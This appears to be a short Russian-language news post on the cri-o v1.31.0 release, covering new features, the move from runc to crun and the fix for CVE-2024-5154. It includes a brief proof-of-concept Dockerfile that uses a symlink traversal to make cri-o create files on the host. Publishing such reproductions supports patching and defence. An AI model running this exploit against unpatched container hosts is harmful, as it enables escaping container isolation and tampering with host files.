cri-o v1.31.0. Из интересных новых фич можно отметить:- Add fine-grained SupplementalGroups control for enhanced security- Added support for the Kubernetes OCI / image Volume SourceТакже нельзя не отметить, что в новом релизе
cri-o теперь использует crun вместо runc.Ко всему прочему была пофикшена
high уязвимость CVE-2024-5154, благодаря которой злоумышленник мог создавать файлы на хостовой системе через symlink. Эксплуатация довольно простая, достаточно было собрать и запустить образ на основе такого Dockerfile:
FROM docker.io/library/busybox as source
RUN mkdir /extra && cd /extra && ln -s ../../../../../../../../root etc
FROM scratch
COPY --from=source /bin /bin
COPY --from=source /lib /lib
COPY --from=source /extra
После запуска такого контейнера, под управлением
cri-o, на хосте будет создан файл /host/mtab.